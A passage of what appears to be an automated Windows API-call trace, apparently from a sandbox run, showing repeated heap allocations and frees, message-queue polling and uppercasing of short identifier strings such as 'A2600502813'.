Flags=0x0, Size=0x8) returned 0x2a71b28 [0210.287] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0210.287] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x15e09) returned 0x2aae878 [0210.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0210.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0210.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0210.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0210.287] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.287] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0210.287] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0210.287] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0210.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0210.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0210.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0210.287] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0210.287] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.287] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0210.287] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0210.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0210.288] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0210.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0210.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b28 [0210.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0210.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0210.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0210.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x15e09) returned 0x2aae878 [0210.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0210.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a18 [0210.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0210.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0210.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b78 [0210.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0210.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0210.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a28 [0210.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0210.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0210.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5d0 [0210.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0210.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0210.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0210.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0210.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0210.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0210.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0210.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x15e09) returned 0x37c0048 [0210.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0210.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0210.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0210.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0210.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0210.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0210.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0210.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0210.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0210.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0210.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0210.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0210.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0210.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0210.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0210.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0210.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0210.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0210.292] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0210.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0210.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0210.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0210.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0210.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0210.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0210.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c78 [0210.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0210.293] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0210.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0210.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0210.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0210.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0210.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0210.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0210.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0210.293] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0210.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0210.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0210.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0210.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0210.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0210.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0210.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0210.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0210.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0210.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0210.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0210.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0210.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0210.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0210.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0210.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0210.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0210.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0210.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0210.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0210.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0210.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0210.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0210.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0210.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0210.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0210.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0210.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0210.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0210.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0210.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0210.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0210.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0210.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0210.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0210.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cf8 [0210.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0210.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0210.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0210.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0210.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0210.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0210.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0210.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c68 [0210.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0210.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0210.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0210.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0210.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0210.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0210.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0210.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0210.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bd8 [0210.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0210.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0210.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0210.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0210.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0210.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0210.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0210.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0210.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0210.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0210.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0210.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0210.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0210.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0210.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0210.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0210.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0210.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0210.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0210.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0210.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0210.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0210.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0210.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0210.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0210.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0210.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0210.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0210.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0210.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0210.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0210.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0210.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0210.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0210.296] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0210.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0210.296] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0210.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaa68 [0210.296] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0210.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0210.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0210.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0210.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0210.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c18 [0210.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0210.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0210.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0210.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0210.297] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0210.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0210.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0210.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0210.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0210.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0210.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0210.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0210.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0210.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0210.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0210.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0210.297] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c78 [0210.297] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.297] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0210.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0210.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf78 [0210.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a741a8 [0210.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0210.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0210.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0210.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0210.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0210.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0210.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0210.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0210.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0210.298] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0210.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0210.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0210.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0210.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0210.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0210.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0210.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0210.298] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0210.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0210.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0210.298] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0210.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0210.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0210.299] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0210.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0210.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0210.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0210.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0210.299] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 